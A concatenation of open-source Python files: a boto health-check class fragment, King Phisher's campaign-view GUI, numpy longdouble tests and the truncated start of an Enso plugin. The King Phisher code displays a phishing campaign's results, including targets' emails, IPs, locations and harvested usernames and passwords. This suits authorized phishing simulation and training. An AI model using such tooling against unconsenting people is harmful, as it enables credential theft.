self.unhealthy_threshold = unhealthy_threshold
def __repr__(self):
return 'HealthCheck:%s' % self.target
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'Interval':
self.interval = int(value)
elif name == 'Target':
self.target = value
elif name == 'HealthyThreshold':
self.healthy_threshold = int(value)
elif name == 'Timeout':
self.timeout = int(value)
elif name == 'UnhealthyThreshold':
self.unhealthy_threshold = int(value)
else:
setattr(self, name, value)
def update(self):
"""
In the case where you have accessed an existing health check on a
load balancer, this method applies this instance's health check
values to the load balancer it is attached to.
.. note:: This method will not do anything if the :py:attr:`access_point`
attribute isn't set, as is the case with a newly instantiated
HealthCheck instance.
"""
if not self.access_point:
return
new_hc = self.connection.configure_health_check(self.access_point,
self)
self.interval = new_hc.interval
self.target = new_hc.target
self.healthy_threshold = new_hc.healthy_threshold
self.unhealthy_threshold = new_hc.unhealthy_threshold
self.timeout = new_hc.timeout
|
apache-2.0
|
hdemeyer/king-phisher
|
king_phisher/client/tabs/campaign.py
|
1
|
27197
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/tabs/campaign.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import datetime
import logging
import threading
import time
from king_phisher import find
from king_phisher import ipaddress
from king_phisher import utilities
from king_phisher.client import export
from king_phisher.client import graphs
from king_phisher.client import gui_utilities
from king_phisher.client.widget import extras
from king_phisher.client.widget import managers
from gi.repository import GdkPixbuf
from gi.repository import GLib
from gi.repository import Gtk
from smoke_zephyr.utilities import parse_timespan
UNKNOWN_LOCATION_STRING = 'N/A (Unknown)'
class CampaignViewGenericTab(gui_utilities.GladeGObject):
"""
This object is meant to be subclassed by all of the tabs which load and
display information about the current campaign.
"""
label_text = 'Unknown'
"""The label of the tab for display in the GUI."""
top_gobject = 'box'
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTab, self).__init__(*args, **kwargs)
self.label = Gtk.Label(label=self.label_text)
"""The :py:class:`Gtk.Label` representing this tab with text from :py:attr:`~.CampaignViewGenericTab.label_text`."""
self.is_destroyed = threading.Event()
getattr(self, self.top_gobject).connect('destroy', self.signal_destroy)
self.last_load_time = float('-inf')
"""The last time the data was loaded from the server."""
self.refresh_frequency = parse_timespan(str(self.config.get('gui.refresh_frequency', '5m')))
"""The lifetime in seconds to wait before refreshing the data from the server."""
self.loader_thread = None
"""The thread object which loads the data from the server."""
self.loader_thread_lock = threading.Lock()
"""The :py:class:`threading.Lock` object used for synchronization between the loader and main threads."""
self.loader_thread_stop = threading.Event()
"""The :py:class:`threading.Event` object used to request that the loader thread stop before completion."""
self.application.connect('campaign-set', self.signal_kpc_campaign_set)
def _sync_loader_thread(self):
"""
Synchronize the loader thread by ensuring that it is stopped. If it is
currently running, this will use :py:attr:`~.loader_thread_stop` to
request that the loader stops early.
"""
if not self.loader_thread_is_running:
return
# it's alive so tell it to stop, wait for it, then proceed
self.loader_thread_stop.set()
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.loader_thread.join(1)
@property
def rpc(self):
return self.application.rpc
@property
def loader_thread_is_running(self):
if self.loader_thread is None:
return False
return self.loader_thread.is_alive()
def load_campaign_information(self, force=True):
raise NotImplementedError()
def signal_button_clicked_refresh(self, button):
self.load_campaign_information()
def signal_destroy(self, gobject):
self.is_destroyed.set()
self.loader_thread_stop.set()
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
self.logger.debug("waiting on thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.logger.debug("joined thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
def signal_kpc_campaign_set(self, *_):
self.load_campaign_information()
class CampaignViewGenericTableTab(CampaignViewGenericTab):
"""
This object is meant to be subclassed by tabs which will display
campaign information of different types from specific database
tables. The data in this object is refreshed when multiple events
occur and it uses an internal timer to represent the last time the
data was refreshed.
"""
dependencies = gui_utilities.GladeDependencies(
children=(
'button_refresh',
'treeview_campaign'
)
)
node_query = None
"""
The GraphQL query used to load a particular node from the remote table.
This query is provided with a single parameter of the node's id.
"""
table_name = ''
"""The database table represented by this tab."""
table_query = None
"""
The GraphQL query used to load the desired information from the remote
table. This query is provided with the following three parameters:
campaign, count and cursor.
"""
view_columns = ()
"""The dictionary map of column numbers to column names starting at column 1."""
xlsx_worksheet_options = None
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTableTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
self.treeview_manager = managers.TreeViewManager(
treeview,
selection_mode=Gtk.SelectionMode.MULTIPLE,
cb_delete=self._prompt_to_delete_row,
cb_refresh=self.load_campaign_information
)
self.treeview_manager.set_column_titles(self.view_columns, column_offset=1)
self.popup_menu = self.treeview_manager.get_popup_menu()
"""The :py:class:`Gtk.Menu` object which is displayed when right-clicking in the view area."""
treeview = self.gobjects['treeview_campaign']
store_columns = [str] * (len(self.view_columns) + 1)
store = Gtk.ListStore(*store_columns)
treeview.set_model(store)
self.application.connect('server-connected', self.signal_kp_server_connected)
def signal_kp_server_connected(self, _):
event_id = 'db-' + self.table_name.replace('_', '-')
server_events = self.application.server_events
server_events.subscribe(event_id, ('deleted', 'inserted', 'updated'), ('id', 'campaign_id'))
server_events.connect(event_id, self.signal_server_event_db)
def signal_server_event_db(self, _, event_type, rows):
get_node = lambda id: self.rpc.graphql(self.node_query, {'id': str(id)})['db']['node']
for row in rows:
if str(row.campaign_id) != self.config['campaign_id']:
continue
model = self.gobjects['treeview_campaign'].get_model()
for case in utilities.switch(event_type):
if case('inserted'):
row_data = self.format_node_data(get_node(row.id))
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(row.id))
gui_utilities.glib_idle_add_wait(model.append, row_data)
ti = gui_utilities.gtk_list_store_search(model, str(row.id))
if ti is None:
self.logger.warning("received server db event: {0} for non-existent row {1}:{2}".format(event_type, self.table_name, str(row.id)))
break
if case('deleted'):
model.remove(ti)
break
if case('updated'):
row_data = self.format_node_data(get_node(row.id))
for idx, cell_data in enumerate(row_data, 1):
model[ti][idx] = self.format_cell_data(cell_data)
break
def _prompt_to_delete_row(self, treeview, _):
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Delete Rows While Loading', self.parent)
return
model = treeview.get_model()
row_ids = [model.get_value(ti, 0) for ti in gui_utilities.gtk_treeview_selection_iterate(treeview)]
if len(row_ids) == 0:
return
elif len(row_ids) == 1:
message = 'Delete This Row?'
else:
message = "Delete These {0:,} Rows?".format(len(row_ids))
if not gui_utilities.show_dialog_yes_no(message, self.parent, 'This information will be lost.'):
return
self.application.emit(self.table_name[:-1] + '-delete', row_ids)
def format_node_data(self, node):
"""
This method is overridden by subclasses to format the raw node
data returned from the server. The length of the list must equal
the number of columns in the table. This method is called for
each node in the remote table by the loader thread.
:param dict node: The node from a GraphQL query representing data for this table.
:return: The formatted row data.
:rtype: list
"""
raise NotImplementedError()
def format_cell_data(self, cell_data, encoding='utf-8'):
"""
This method provides formatting to the individual cell values returned
from the :py:meth:`.format_row_data` function. Values are converted into
a format suitable for reading.
:param cell: The value to format.
:param str encoding: The encoding to use to coerce the return value into a unicode string.
:return: The formatted cell value.
:rtype: str
"""
if isinstance(cell_data, datetime.datetime):
cell_data = utilities.datetime_utc_to_local(cell_data)
return utilities.format_datetime(cell_data, encoding=encoding)
if cell_data is None:
cell_data = ''
elif isinstance(cell_data, int):
cell_data = str(cell_data)
# ensure that the return value is a unicode string
if isinstance(cell_data, bytes):
cell_data = cell_data.decode(encoding)
return cell_data
def load_campaign_information(self, force=True):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewGenericTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewGenericTab.refresh_frequency` to
check if the information is stale. If the local data is not stale,
this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
self.loader_thread_lock.acquire()
self._sync_loader_thread()
self.loader_thread_stop.clear()
store = self.gobjects['treeview_campaign'].get_model()
store.clear()
self.loader_thread = threading.Thread(target=self.loader_thread_routine, args=(store,))
self.loader_thread.daemon = True
self.loader_thread.start()
self.loader_thread_lock.release()
return
def loader_thread_routine(self, store):
"""
The loading routine to be executed within a thread.
:param store: The store object to place the new data.
:type store: :py:class:`Gtk.ListStore`
"""
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', False))
campaign_id = self.config['campaign_id']
count = 500
page_info = {'endCursor': None, 'hasNextPage': True}
while page_info['hasNextPage']:
if self.rpc is None:
break
results = self.rpc.graphql(self.table_query, {'campaign': campaign_id, 'count': count, 'cursor': page_info['endCursor']})
if self.loader_thread_stop.is_set():
break
if self.is_destroyed.is_set():
break
for edge in results['db']['campaign'][self.table_name]['edges']:
row_data = self.format_node_data(edge['node'])
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(edge['node']['id']))
gui_utilities.glib_idle_add_wait(store.append, row_data)
page_info = results['db']['campaign'][self.table_name]['pageInfo']
if self.is_destroyed.is_set():
return
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', True))
self.last_load_time = time.time()
def signal_button_clicked_export(self, button):
self.export_table_to_csv()
def export_table_to_csv(self):
"""Export the data represented by the view to a CSV file."""
if not self.loader_thread_lock.acquire(False) or (isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive()):
gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent)
return
dialog = extras.FileChooserDialog('Export Data', self.parent)
file_name = self.config['campaign_name'] + '.csv'
response = dialog.run_quick_save(file_name)
dialog.destroy()
if not response:
self.loader_thread_lock.release()
return
destination_file = response['target_path']
store = self.gobjects['treeview_campaign'].get_model()
columns = dict(enumerate(('UID',) + self.view_columns))
export.liststore_to_csv(store, destination_file, columns)
self.loader_thread_lock.release()
def export_table_to_xlsx_worksheet(self, worksheet, title_format):
"""
Export the data represented by the view to an XLSX worksheet.
:param worksheet: The destination sheet for the store's data.
:type worksheet: :py:class:`xlsxwriter.worksheet.Worksheet`
:param title_format: The formatting to use for the title row.
:type title_format: :py:class:`xlsxwriter.format.Format`
"""
if not self.loader_thread_lock.acquire(False) or (isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive()):
gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent)
return
store = self.gobjects['treeview_campaign'].get_model()
columns = dict(enumerate(('UID',) + self.view_columns))
export.liststore_to_xlsx_worksheet(store, worksheet, columns, title_format, xlsx_options=self.xlsx_worksheet_options)
self.loader_thread_lock.release()
class CampaignViewDeaddropTab(CampaignViewGenericTableTab):
"""Display campaign information regarding dead drop connections."""
table_name = 'deaddrop_connections'
label_text = 'Deaddrop'
node_query = """\
query getDeaddropConnection($id: String!) {
db {
node: deaddropConnection(id: $id) {
id
deaddropDeployment { destination }
visitCount
visitorIp
localUsername
localHostname
localIpAddresses
firstVisit
lastVisit
}
}
}
"""
table_query = """\
query getDeaddropConnections($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
deaddropConnections(first: $count, after: $cursor) {
total
edges {
node {
id
deaddropDeployment { destination }
visitCount
visitorIp
localUsername
localHostname
localIpAddresses
firstVisit
lastVisit
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Destination',
'Visit Count',
'IP Address',
'Username',
'Hostname',
'Local IP Addresses',
'First Hit',
'Last Hit'
)
def format_node_data(self, connection):
deploy_details = self.rpc.remote_table_row('deaddrop_deployments', connection.deployment_id, cache=True)
if not deploy_details:
return None
row = (
deploy_details.destination,
connection.visit_count,
connection.visitor_ip,
connection.local_username,
connection.local_hostname,
connection.local_ip_addresses,
connection.first_visit,
connection.last_visit
)
return row
class CampaignViewCredentialsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding submitted credentials."""
table_name = 'credentials'
label_text = 'Credentials'
node_query = """\
query getCredential($id: String!) {
db {
node: credential(id: $id) {
id
message { targetEmail }
username
password
submitted
}
}
}
"""
table_query = """\
query getCredentials($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
credentials(first: $count, after: $cursor) {
total
edges {
node {
id
message { targetEmail }
username
password
submitted
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'Username',
'Password',
'Submitted'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(20, 30, 30, 30, 25),
title=label_text
)
def __init__(self, *args, **kwargs):
super(CampaignViewCredentialsTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
pwd_column_id = self.view_columns.index('Password')
treeview.get_column(pwd_column_id).set_property('visible', False)
def format_node_data(self, node):
row = (
node['message']['targetEmail'],
node['username'],
node['password'],
node['submitted']
)
return row
def signal_button_toggled_show_passwords(self, button):
treeview = self.gobjects['treeview_campaign']
pwd_column_id = self.view_columns.index('Password')
treeview.get_column(pwd_column_id).set_property('visible', button.get_property('active'))
class CampaignViewDashboardTab(CampaignViewGenericTab):
"""Display campaign information on a graphical dash board."""
dependencies = gui_utilities.GladeDependencies(
children=(
'box_top_left',
'box_top_right',
'box_bottom',
'scrolledwindow_top_left',
'scrolledwindow_top_right',
'scrolledwindow_bottom'
)
)
label_text = 'Dashboard'
"""The tabs label for display in the GUI."""
def __init__(self, *args, **kwargs):
super(CampaignViewDashboardTab, self).__init__(*args, **kwargs)
self.graphs = []
"""The :py:class:`.CampaignGraph` classes represented on the dash board."""
dash_ports = {
# dashboard position, (width, height)
'top_left': (380, 200),
'top_right': (380, 200),
'bottom': (760, 200)
}
for dash_port, details in dash_ports.items():
graph_name = self.config['dashboard.' + dash_port]
cls = graphs.get_graph(graph_name)
if not cls:
self.logger.warning('could not get graph: ' + graph_name)
logo_file_path = find.data_file('king-phisher-icon.svg')
if logo_file_path:
image = Gtk.Image.new_from_pixbuf(GdkPixbuf.Pixbuf.new_from_file_at_size(logo_file_path, 128, 128))
image.show()
self.gobjects['scrolledwindow_' + dash_port].add(image)
continue
graph_inst = cls(self.application, details, getattr(self, self.top_gobject).get_style_context())
self.gobjects['scrolledwindow_' + dash_port].add(graph_inst.canvas)
self.gobjects['box_' + dash_port].pack_end(graph_inst.navigation_toolbar, False, False, 0)
self.graphs.append(graph_inst)
self.logger.debug("dashboard refresh frequency set to {0} seconds".format(self.refresh_frequency))
GLib.timeout_add_seconds(self.refresh_frequency, self.loader_idle_routine)
def load_campaign_information(self, force=True):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the :py:attr:`~.last_load_time` is compared with
the :py:attr:`~.refresh_frequency` to check if the information is stale.
If the local data is not stale, this function will return without
updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if not self.application.rpc:
self.logger.warning('skipping load_campaign_information because rpc is not initialized')
return
with self.loader_thread_lock:
self._sync_loader_thread()
self.loader_thread_stop.clear()
self.loader_thread = threading.Thread(target=self.loader_thread_routine)
self.loader_thread.daemon = True
self.loader_thread.start()
def loader_idle_routine(self):
"""The routine which refreshes the campaign data at a regular interval."""
if self.rpc and not self.loader_thread_is_running:
self.logger.debug('idle loader routine called')
self.load_campaign_information()
return True
def loader_thread_routine(self):
"""The loading routine to be executed within a thread."""
if not 'campaign_id' in self.config:
return
if not self.rpc.remote_table_row('campaigns', self.config['campaign_id']):
return
info_cache = {}
for graph in self.graphs:
if self.loader_thread_stop.is_set():
break
if self.is_destroyed.is_set():
break
info_cache.update(gui_utilities.glib_idle_add_wait(lambda g=graph: g.refresh(info_cache, self.loader_thread_stop)))
else:
self.last_load_time = time.time()
class CampaignViewVisitsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding incoming visitors."""
table_name = 'visits'
label_text = 'Visits'
node_query = """\
query getVisit($id: String!) {
db {
node: visit(id: $id) {
id
message { targetEmail }
visitorIp
visitCount
visitorDetails
visitorGeoloc { city }
firstVisit
lastVisit
}
}
}
"""
table_query = """\
query getVisits($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
visits(first: $count, after: $cursor) {
total
edges {
node {
id
message { targetEmail }
visitorIp
visitCount
visitorDetails
visitorGeoloc { city }
firstVisit
lastVisit
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'IP Address',
'Visit Count',
'Visitor User Agent',
'Visitor Location',
'First Visit',
'Last Visit'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(30, 30, 25, 15, 90, 30, 25, 25),
title=label_text
)
def format_node_data(self, node):
geo_location = UNKNOWN_LOCATION_STRING
visitor_ip = node['visitorIp']
if visitor_ip is None:
visitor_ip = ''
else:
visitor_ip = ipaddress.ip_address(visitor_ip)
if visitor_ip.is_loopback:
geo_location = 'N/A (Loopback)'
elif visitor_ip.is_private:
geo_location = 'N/A (Private)'
elif isinstance(visitor_ip, ipaddress.IPv6Address):
geo_location = 'N/A (IPv6 Address)'
elif node['visitorGeoloc']:
geo_location = node['visitorGeoloc']['city']
row = (
node['message']['targetEmail'],
str(visitor_ip),
node['visitCount'],
node['visitorDetails'],
geo_location,
node['firstVisit'],
node['lastVisit']
)
return row
class CampaignViewMessagesTab(CampaignViewGenericTableTab):
"""Display campaign information regarding sent messages."""
table_name = 'messages'
label_text = 'Messages'
node_query = """\
query getMessage($id: String!) {
db {
node: message(id: $id) {
id
targetEmail
sent
trained
companyDepartment { name }
opened
openerIp
openerUserAgent
}
}
}
"""
table_query = """\
query getMessages($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
messages(first: $count, after: $cursor) {
total
edges {
node {
id
targetEmail
sent
trained
companyDepartment { name }
opened
openerIp
openerUserAgent
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'Sent',
'Trained',
'Department',
'Opened',
'Opener IP Address',
'Opener User Agent'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(30, 30, 30, 15, 20, 20, 25, 90),
title=label_text
)
def format_node_data(self, node):
department = node['companyDepartment']
if department:
department = department['name']
row = (
node['targetEmail'],
node['sent'],
('Yes' if node['trained'] else ''),
department,
node['opened'],
node['openerIp'],
node['openerUserAgent']
)
return row
class CampaignViewTab(object):
"""
The King Phisher client top-level 'View Campaign' tab. This object
manages the sub-tabs which display all the information regarding
the current campaign.
"""
def __init__(self, parent, application):
"""
:param parent: The parent window for this object.
:type parent: :py:class:`Gtk.Window`
:param application: The main client application instance.
:type application: :py:class:`Gtk.Application`
"""
self.parent = parent
self.application = application
self.config = application.config
self.logger = logging.getLogger('KingPhisher.Client.' + self.__class__.__name__)
self.box = Gtk.Box()
self.box.set_property('orientation', Gtk.Orientation.VERTICAL)
self.box.show()
self.label = Gtk.Label(label='View Campaign')
"""The :py:class:`Gtk.Label` representing this tabs name."""
self.notebook = Gtk.Notebook()
""" The :py:class:`Gtk.Notebook` for holding sub-tabs."""
self.notebook.connect('switch-page', self.signal_notebook_switch_page)
self.notebook.set_scrollable(True)
self.box.pack_start(self.notebook, True, True, 0)
self.tabs = utilities.FreezableDict()
"""A dict object holding the sub tabs managed by this object."""
current_page = self.notebook.get_current_page()
self.last_page_id = current_page
if graphs.has_matplotlib:
self.logger.info('matplotlib is installed, dashboard will be available')
dashboard_tab = CampaignViewDashboardTab(application)
self.tabs['dashboard'] = dashboard_tab
self.notebook.append_page(dashboard_tab.box, dashboard_tab.label)
else:
self.logger.warning('matplotlib is not installed, dashboard will not be available')
messages_tab = CampaignViewMessagesTab(application)
self.tabs['messages'] = messages_tab
self.notebook.append_page(messages_tab.box, messages_tab.label)
visits_tab = CampaignViewVisitsTab(application)
self.tabs['visits'] = visits_tab
self.notebook.append_page(visits_tab.box, visits_tab.label)
credentials_tab = CampaignViewCredentialsTab(application)
self.tabs['credentials'] = credentials_tab
self.notebook.append_page(credentials_tab.box, credentials_tab.label)
if self.config.get('gui.show_deaddrop', False):
deaddrop_connections_tab = CampaignViewDeaddropTab(application)
self.tabs['deaddrop_connections'] = deaddrop_connections_tab
self.notebook.append_page(deaddrop_connections_tab.box, deaddrop_connections_tab.label)
self.tabs.freeze()
for tab in self.tabs.values():
tab.box.show()
self.notebook.show()
def signal_notebook_switch_page(self, notebook, current_page, index):
if not hasattr(self.parent, 'rpc'):
return
#previous_page = notebook.get_nth_page(self.last_page_id)
self.last_page_id = index
for tab in self.tabs.values():
if current_page != tab.box:
continue
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information(force=False)
|
bsd-3-clause
|
JFriel/honours_project
|
venv/lib/python2.7/site-packages/numpy/core/tests/test_longdouble.py
|
65
|
5845
|
from __future__ import division, absolute_import, print_function
import locale
import numpy as np
from numpy.testing import (
run_module_suite, assert_, assert_equal, dec, assert_raises,
assert_array_equal, TestCase, temppath,
)
from numpy.compat import sixu
from test_print import in_foreign_locale
longdouble_longer_than_double = (np.finfo(np.longdouble).eps
< np.finfo(np.double).eps)
_o = 1 + np.finfo(np.longdouble).eps
string_to_longdouble_inaccurate = (_o != np.longdouble(repr(_o)))
del _o
def test_scalar_extraction():
"""Confirm that extracting a value doesn't convert to python float"""
o = 1 + np.finfo(np.longdouble).eps
a = np.array([o, o, o])
assert_equal(a[1], o)
# Conversions string -> long double
def test_repr_roundtrip():
o = 1 + np.finfo(np.longdouble).eps
assert_equal(np.longdouble(repr(o)), o,
"repr was %s" % repr(o))
def test_unicode():
np.longdouble(sixu("1.2"))
def test_string():
np.longdouble("1.2")
def test_bytes():
np.longdouble(b"1.2")
@in_foreign_locale
def test_fromstring_foreign():
f = 1.234
a = np.fromstring(repr(f), dtype=float, sep=" ")
assert_equal(a[0], f)
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_repr_roundtrip_bytes():
o = 1 + np.finfo(np.longdouble).eps
assert_equal(np.longdouble(repr(o).encode("ascii")), o)
@in_foreign_locale
def test_repr_roundtrip_foreign():
o = 1.5
assert_equal(o, np.longdouble(repr(o)))
def test_bogus_string():
assert_raises(ValueError, np.longdouble, "spam")
assert_raises(ValueError, np.longdouble, "1.0 flub")
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_fromstring():
o = 1 + np.finfo(np.longdouble).eps
s = (" " + repr(o))*5
a = np.array([o]*5)
assert_equal(np.fromstring(s, sep=" ", dtype=np.longdouble), a,
err_msg="reading '%s'" % s)
@in_foreign_locale
def test_fromstring_best_effort_float():
assert_equal(np.fromstring("1,234", dtype=float, sep=" "),
np.array([1.]))
@in_foreign_locale
def test_fromstring_best_effort():
assert_equal(np.fromstring("1,234", dtype=np.longdouble, sep=" "),
np.array([1.]))
def test_fromstring_bogus():
assert_equal(np.fromstring("1. 2. 3. flop 4.", dtype=float, sep=" "),
np.array([1., 2., 3.]))
def test_fromstring_empty():
assert_equal(np.fromstring("xxxxx", sep="x"),
np.array([]))
def test_fromstring_missing():
assert_equal(np.fromstring("1xx3x4x5x6", sep="x"),
np.array([1]))
class FileBased(TestCase):
ldbl = 1 + np.finfo(np.longdouble).eps
tgt = np.array([ldbl]*5)
out = ''.join([repr(t) + '\n' for t in tgt])
def test_fromfile_bogus(self):
with temppath() as path:
with open(path, 'wt') as f:
f.write("1. 2. 3. flop 4.\n")
res = np.fromfile(path, dtype=float, sep=" ")
assert_equal(res, np.array([1., 2., 3.]))
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_fromfile(self):
with temppath() as path:
with open(path, 'wt') as f:
f.write(self.out)
res = np.fromfile(path, dtype=np.longdouble, sep="\n")
assert_equal(res, self.tgt)
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_genfromtxt(self):
with temppath() as path:
with open(path, 'wt') as f:
f.write(self.out)
res = np.genfromtxt(path, dtype=np.longdouble)
assert_equal(res, self.tgt)
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_loadtxt(self):
with temppath() as path:
with open(path, 'wt') as f:
f.write(self.out)
res = np.loadtxt(path, dtype=np.longdouble)
assert_equal(res, self.tgt)
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_tofile_roundtrip(self):
with temppath() as path:
self.tgt.tofile(path, sep=" ")
res = np.fromfile(path, dtype=np.longdouble, sep=" ")
assert_equal(res, self.tgt)
@in_foreign_locale
def test_fromstring_foreign():
s = "1.234"
a = np.fromstring(s, dtype=np.longdouble, sep=" ")
assert_equal(a[0], np.longdouble(s))
@in_foreign_locale
def test_fromstring_foreign_sep():
a = np.array([1, 2, 3, 4])
b = np.fromstring("1,2,3,4,", dtype=np.longdouble, sep=",")
assert_array_equal(a, b)
@in_foreign_locale
def test_fromstring_foreign_value():
b = np.fromstring("1,234", dtype=np.longdouble, sep=" ")
assert_array_equal(b[0], 1)
# Conversions long double -> string
def test_repr_exact():
o = 1 + np.finfo(np.longdouble).eps
assert_(repr(o) != '1')
@dec.knownfailureif(longdouble_longer_than_double, "BUG #2376")
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_format():
o = 1 + np.finfo(np.longdouble).eps
assert_("{0:.40g}".format(o) != '1')
@dec.knownfailureif(longdouble_longer_than_double, "BUG #2376")
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_percent():
o = 1 + np.finfo(np.longdouble).eps
assert_("%.40g" % o != '1')
@dec.knownfailureif(longdouble_longer_than_double, "array repr problem")
@dec.knownfailureif(string_to_longdouble_inaccurate, "Need strtold_l")
def test_array_repr():
o = 1 + np.finfo(np.longdouble).eps
a = np.array([o])
b = np.array([1], dtype=np.longdouble)
if not np.all(a != b):
raise ValueError("precision loss creating arrays")
assert_(repr(a) != repr(b))
if __name__ == "__main__":
run_module_suite()
|
gpl-3.0
|
pf/enso
|
enso/contrib/evaluate.py
|
8
|
5500
|
# Copyright (c) 2008, Humanized, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Enso nor the names of its contributors may
# be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Humanized, Inc. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Humanized, Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
#
# enso.contrib.evaluate
#
# ----------------------------------------------------------------------------
"""
An Enso plugin that makes the 'evaluate' command available.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
from enso.commands import CommandManager, CommandObject
from enso.utils import xml_tools
# ----------------------------------------------------------------------------
# The Evaluate command
# ---------------------------------------------------------------------------
class EvalCommand( CommandObject ):
"""
The 'evaluate' command.
"""
NAME = "evaluate"
DESCRIPTION = "Evaluates the current selection as Python code."
def __init__( self, displayMessage=None, selection=None ):
super( EvalCommand, self ).__init__()
self.setDescription( self.DESCRIPTION )
self.setName( self.NAME )
if displayMessage is None:
from enso import messages
